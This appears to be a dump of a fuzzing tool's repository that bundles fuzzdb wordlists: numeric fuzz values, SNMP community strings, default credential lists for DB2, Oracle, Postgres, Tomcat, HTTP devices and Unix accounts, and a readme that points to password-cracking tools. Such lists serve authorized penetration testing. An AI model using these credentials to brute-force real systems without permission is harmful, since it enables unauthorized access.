49 | 1#SNAN
50 | 1#IND
51 | 0x0
52 | 0xffffffff
53 | 0xffffffffffffffff
54 | 0xabad1dea
55 | 123456789012345678901234567890123456789
56 | 1,000.00
57 | 1 000.00
58 | 1'000.00
59 | 1,000,000.00
60 | 1 000 000.00
61 | 1'000'000.00
62 | 1.000,00
63 | 1 000,00
64 | 1'000,00
65 | 1.000.000,00
66 | 1 000 000,00
67 | 1'000'000,00
68 | 01000
69 | 08
70 | 09
71 | 2.2250738585072011e-308
72 | 


--------------------------------------------------------------------------------
/fuzzdb/wordlists-misc/wordlist-alphanumeric-case.txt:
--------------------------------------------------------------------------------
 1 | 0
 2 | 1
 3 | 2
 4 | 3
 5 | 4
 6 | 5
 7 | 6
 8 | 7
 9 | 8
10 | 9
11 | a
12 | b
13 | c
14 | d
15 | e
16 | f
17 | g
18 | h
19 | i
20 | j
21 | k
22 | l
23 | m
24 | n
25 | o
26 | p
27 | q
28 | r
29 | s
30 | t
31 | u
32 | v
33 | w
34 | x
35 | y
36 | z
37 | A
38 | B
39 | C
40 | D
41 | E
42 | F
43 | G
44 | H
45 | I
46 | J
47 | K
48 | L
49 | M
50 | N
51 | O
52 | P
53 | Q
54 | R
55 | S
56 | T
57 | U
58 | V
59 | W
60 | X
61 | Y
62 | Z
63 | 


--------------------------------------------------------------------------------
/fuzzdb/wordlists-misc/wordlist-common-snmp-community-strings.txt:
--------------------------------------------------------------------------------
  1 | public
  2 | private
  3 | 0
  4 | 0392a0
  5 | 1234
  6 | 2read
  7 | 4changes
  8 | ANYCOM
  9 | Admin
 10 | C0de
 11 | CISCO
 12 | CR52401
 13 | IBM
 14 | ILMI
 15 | Intermec
 16 | NoGaH$@!
 17 | OrigEquipMfr
 18 | PRIVATE
 19 | PUBLIC
 20 | Private
 21 | Public
 22 | SECRET
 23 | SECURITY
 24 | SNMP
 25 | SNMP_trap
 26 | SUN
 27 | SWITCH
 28 | SYSTEM
 29 | Secret
 30 | Security
 31 | s!a@m#n$p%c
 32 | Switch
 33 | System
 34 | TENmanUFactOryPOWER
 35 | TEST
 36 | access
 37 | adm
 38 | admin
 39 | agent
 40 | agent_steal
 41 | all
 42 | all private
 43 | all public
 44 | apc
 45 | bintec
 46 | blue
 47 | c
 48 | cable-d
 49 | canon_admin
 50 | cc
 51 | cisco
 52 | community
 53 | core
 54 | debug
 55 | default
 56 | dilbert
 57 | enable
 58 | field
 59 | field-service
 60 | freekevin
 61 | fubar
 62 | guest
 63 | hello
 64 | hp_admin
 65 | ibm
 66 | ilmi
 67 | intermec
 68 | internal
 69 | l2
 70 | l3
 71 | manager
 72 | mngt
 73 | monitor
 74 | netman
 75 | network
 76 | none
 77 | openview
 78 | pass
 79 | password
 80 | pr1v4t3
 81 | proxy
 82 | publ1c
 83 | read
 84 | read-only
 85 | read-write
 86 | readwrite
 87 | red
 88 | regional
 89 | rmon
 90 | rmon_admin
 91 | ro
 92 | root
 93 | router
 94 | rw
 95 | rwa
 96 | san-fran
 97 | sanfran
 98 | scotty
 99 | secret
100 | security
101 | seri
102 | snmp
103 | snmpd
104 | snmptrap
105 | solaris
106 | sun
107 | superuser
108 | switch
109 | system
110 | tech
111 | test
112 | test2
113 | tiv0li
114 | tivoli
115 | trap
116 | world
117 | write
118 | xyzzy
119 | yellow
120 | 


--------------------------------------------------------------------------------
/fuzzdb/wordlists-misc/wordlist-dna.txt:
--------------------------------------------------------------------------------
1 | a
2 | t
3 | c
4 | g
5 | 


--------------------------------------------------------------------------------
/fuzzdb/wordlists-user-passwd/db2/db2_default_pass.txt:
--------------------------------------------------------------------------------
1 | db2inst1
2 | dasusr1
3 | db2fenc1
4 | db2pass
5 | db2pw
6 | db2password
7 | admin
8 | db2admin
9 | 


--------------------------------------------------------------------------------
/fuzzdb/wordlists-user-passwd/db2/db2_default_user.txt:
--------------------------------------------------------------------------------
1 | db2inst1
2 | dasusr1
3 | db2fenc1
4 | admin
5 | db2admin
6 | 


--------------------------------------------------------------------------------
/fuzzdb/wordlists-user-passwd/db2/db2_default_userpass.txt:
--------------------------------------------------------------------------------
1 | db2inst1 db2inst1
2 | db2inst1 db2pass
3 | db2inst1 db2pw
4 | db2inst1 db2password
5 | dasusr1 dasusr1
6 | db2fenc1 db2fenc1
7 | db2admin db2admin
8 | 
9 | 


--------------------------------------------------------------------------------
/fuzzdb/wordlists-user-passwd/generic-listpairs/http_default_pass.txt:
--------------------------------------------------------------------------------
 1 | admin
 2 | password
 3 | manager
 4 | letmein
 5 | cisco
 6 | default
 7 | root
 8 | apc
 9 | pass
10 | security
11 | user
12 | system
13 | sys
14 | none
15 | 


--------------------------------------------------------------------------------
/fuzzdb/wordlists-user-passwd/generic-listpairs/http_default_userpass.txt:
--------------------------------------------------------------------------------
1 | # needs help
2 | connect connect
3 | sitecom sitecom
4 | admin 1234
5 | cisco cisco
6 | cisco sanfran
7 | private private
8 | 


--------------------------------------------------------------------------------
/fuzzdb/wordlists-user-passwd/generic-listpairs/http_default_users.txt:
--------------------------------------------------------------------------------
 1 | admin
 2 | manager
 3 | root
 4 | cisco
 5 | apc
 6 | pass
 7 | security
 8 | user
 9 | system
10 | sys
11 | 


--------------------------------------------------------------------------------
/fuzzdb/wordlists-user-passwd/oracle/_hci_oracle_passwords.txt:
--------------------------------------------------------------------------------
 1 | "AMBU,hacschema"
 2 | "QUEUE_USER,qmanager"
 3 | "SYS,alLp0ver2"
 4 | "SYSTEM,urA7mvP"
 5 | "CHANGEMGR,datacontrol"
 6 | "CCDEV,ccdev"
 7 | "CCDBA,ccnulls                "
 8 | "CCDATA,ccdata"
 9 | "CCFORMS,ccforms"
10 | "CCINTERFACE,ccinterface"
11 | "MCKHEO,mckheo"
12 | "CCREL,ccrel"
13 | "CCQUERY,ccquery"
14 | "CDXWEB,winplu5"
15 | "DRUG1,fdb3schema"
16 | "DRUG2,fdb3schema"
17 | "enc_ent,encent"
18 | "ENT,entpazz"
19 | "ENT_CONFIG,ent_configpazz"
20 | "ADF,adfpazz"
21 | "INF,infpazz"
22 | "INF_CONFIG,inf_configpazz"
23 | "SDM,sdmpazz"
24 | "STRMADM,pazzw0rd"
25 | "ENT_AUD,pazzw0rd"
26 | "ENT_ARCH,pazzw0rd"
27 | "POC_ARCH,pazzw0rd"
28 | "POC_AQ,qmanager"
29 | "INF_AQ,qmanager"
30 | "DATAMGR,datamgr"
31 | "CCUSER,bueno"
32 | "ALERTS,monitorhca"
33 | "HCALERTS,alertsuser"
34 | "AM,ampazz"
35 | "AM_AUD,pazzw0rd"
36 | "AUD,audpazz"
37 | "TMF,tmfpazz"
38 | "MN,mnpazz"
39 | "EH,ehpazz"
40 | "NG,ngpazz"
41 | "DM,dmpazz"
42 | "DMTOOL,dmtoolpazz"
43 | "STG_DMT,stg_dmtpazz"
44 | "WRL,wrlpazz"
45 | "NOTES,notespazz"
46 | "REPORTS,reportspazz"
47 | "ICONS,iconspazz"
48 | "BS,bspazz"
49 | "QZ,qzpazz"
50 | "RM,rmpazz"
51 | "RM_AUD,pazzw0rd"
52 | "COMMGR,commgrpazz"
53 | "OPSERVICE,opservicepazz"
54 | "SEC_CONFIG,sec_configpazz"
55 | "CTXSYS,ctxsyspazz"
56 | "OLOGY,ologypazz"
57 | "OLOGY_CONFIG,ology_configpazz"
58 | "DOC,docpazz"
59 | "DOC_CONFIG,doc_configpazz"
60 | "PORTAL,portal"
61 | "PORTAL_INSTALL,portal_install"
62 | "EBIDBADMIN,ebidbadmin"
63 | "DESIGN_OWNER,owb"
64 | "OWB_RUNTIME_REPOSITORY,owb"
65 | "RUNTIME_A_USER,owb"
66 | 


--------------------------------------------------------------------------------
/fuzzdb/wordlists-user-passwd/passwds/phpbb.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/wordlists-user-passwd/passwds/phpbb.txt


--------------------------------------------------------------------------------
/fuzzdb/wordlists-user-passwd/postgres/postgres_default_pass.txt:
--------------------------------------------------------------------------------
1 | 
2 | tiger
3 | postgres
4 | password
5 | admin
6 | 


--------------------------------------------------------------------------------
/fuzzdb/wordlists-user-passwd/postgres/postgres_default_user.txt:
--------------------------------------------------------------------------------
1 | postgres
2 | scott
3 | admin
4 | 


--------------------------------------------------------------------------------
/fuzzdb/wordlists-user-passwd/postgres/postgres_default_userpass.txt:
--------------------------------------------------------------------------------
1 | postgres postgres
2 | postgres password
3 | postgres admin
4 | admin admin
5 | admin password
6 | 


--------------------------------------------------------------------------------
/fuzzdb/wordlists-user-passwd/readme.txt:
--------------------------------------------------------------------------------
 1 | 
 2 | various notes
 3 | 
 4 | leetspeak filter 
 5 | cat plain.wordlist | sed -e 's/a/4/g' -e 's/e/3/g' -e 's/i/1/g' -e 's/o/0/g' -e 's/s/5/g' -e 's/t/7/g' > l337.wordlist
 6 | 
 7 | more wordlists
 8 | ftp://ftp.ox.ac.uk/pub/wordlists/
 9 | http://theargon.com/achilles/wordlists/
10 | http://www.totse.com/en/hack/word_lists/index.html
11 | http://www.outpost9.com/files/WordLists.html
12 | http://packetstormsecurity.org/Crackers/wordlists/
13 | 
14 | passwd brute force tools
15 | 
16 | cupp - passwd profiler
17 | http://www.remote-exploit.org/?page_id=506
18 | 
19 | awlg - associative wordlist generator
20 | http://awlg.org/index.gen
21 | 
22 | thc-hydra
23 | http://freeworld.thc.org/thc-hydra/
24 | 
25 | cain & abel
26 | http://www.oxid.it/cain.html
27 | 
28 | jtr
29 | http://www.openwall.com/john/
30 | 
31 | lcp - free l0phtcrack replacement
32 | http://www.lcpsoft.com/english/download.htm
33 | 
34 | 
35 | 


--------------------------------------------------------------------------------
/fuzzdb/wordlists-user-passwd/tomcat/tomcat_mgr_default_pass.txt:
--------------------------------------------------------------------------------
1 | admin
2 | manager
3 | role1
4 | root
5 | tomcat
6 | 


--------------------------------------------------------------------------------
/fuzzdb/wordlists-user-passwd/tomcat/tomcat_mgr_default_userpass.txt:
--------------------------------------------------------------------------------
1 | j2deployer j2deployer
2 | ovwebusr OvW*busr1
3 | cxsdk kdsxc
4 | root owaspbwa
5 | 


--------------------------------------------------------------------------------
/fuzzdb/wordlists-user-passwd/tomcat/tomcat_mgr_default_users.txt:
--------------------------------------------------------------------------------
1 | admin
2 | manager
3 | role1
4 | root
5 | tomcat
6 | both
7 | 


--------------------------------------------------------------------------------
/fuzzdb/wordlists-user-passwd/unix-os/unix_users.txt:
--------------------------------------------------------------------------------
  1 | 4Dgifts
  2 | EZsetup
  3 | OutOfBox
  4 | ROOT
  5 | adm
  6 | admin
  7 | administrator
  8 | anon
  9 | auditor
 10 | avahi
 11 | avahi-autoipd
 12 | backup
 13 | bbs
 14 | bin
 15 | checkfs
 16 | checkfsys
 17 | checksys
 18 | cmwlogin
 19 | couchdb
 20 | daemon
 21 | dbadmin
 22 | demo
 23 | demos
 24 | diag
 25 | distccd
 26 | dni
 27 | fal
 28 | fax
 29 | ftp
 30 | games
 31 | gdm
 32 | gnats
 33 | gopher
 34 | gropher
 35 | guest
 36 | haldaemon
 37 | halt
 38 | hplip
 39 | informix
 40 | install
 41 | irc
 42 | kernoops
 43 | libuuid
 44 | list
 45 | listen
 46 | lp
 47 | lpadm
 48 | lpadmin
 49 | lynx
 50 | mail
 51 | man
 52 | me
 53 | messagebus
 54 | mountfs
 55 | mountfsys
 56 | mountsys
 57 | news
 58 | noaccess
 59 | nobody
 60 | nobody4
 61 | nuucp
 62 | nxpgsql
 63 | operator
 64 | oracle
 65 | popr
 66 | postgres
 67 | postmaster
 68 | printer
 69 | proxy
 70 | pulse
 71 | rfindd
 72 | rje
 73 | root
 74 | rooty
 75 | saned
 76 | service
 77 | setup
 78 | sgiweb
 79 | sigver
 80 | speech-dispatcher
 81 | sshd
 82 | sym
 83 | symop
 84 | sync
 85 | sys
 86 | sysadm
 87 | sysadmin
 88 | sysbin
 89 | syslog
 90 | system_admin
 91 | trouble
 92 | udadmin
 93 | ultra
 94 | umountfs
 95 | umountfsys
 96 | umountsys
 97 | unix
 98 | us_admin
 99 | user
100 | uucp
101 | uucpadm
102 | web
103 | webmaster
104 | www
105 | www-data
106 | xpdb
107 | xpopr
108 | zabbix
109 | 


--------------------------------------------------------------------------------
/lib/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python 
2 | # -*- coding:utf-8 -*-
3 | 
4 | __all__ = ['colors']


--------------------------------------------------------------------------------
/lib/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/lib/__init__.pyc


--------------------------------------------------------------------------------
/lib/colors.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python 
 2 | # -*- coding:utf-8 -*- 
 3 | class colors:
 4 | 	""" Colors """
 5 | 	BLUE = '\033[1;34m'
 6 | 	GREEN = '\033[1;32m'
 7 | 	RED = '\033[1;31m' 
 8 | 	WHITE = '\033[1;37m'
 9 | 	CYAN = '\033[1;36m'
10 | 	YELLOW = '\033[1;33m'
11 | 	CRIMSON = '\033[1;38m'
12 | 	RESET = '\033[0m'
13 | 	IND = '\033[04m'
14 | 	LIGHTRED = '\033[91m'
15 | 	CYAN = '\033[96m'
16 | 	MAGANTA = '\033[95m'
17 | 


--------------------------------------------------------------------------------
/lib/colors.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/lib/colors.pyc


--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | requests
2 | optparse-pretty
3 | urlparse2
4 | getopts
5 | 


--------------------------------------------------------------------------------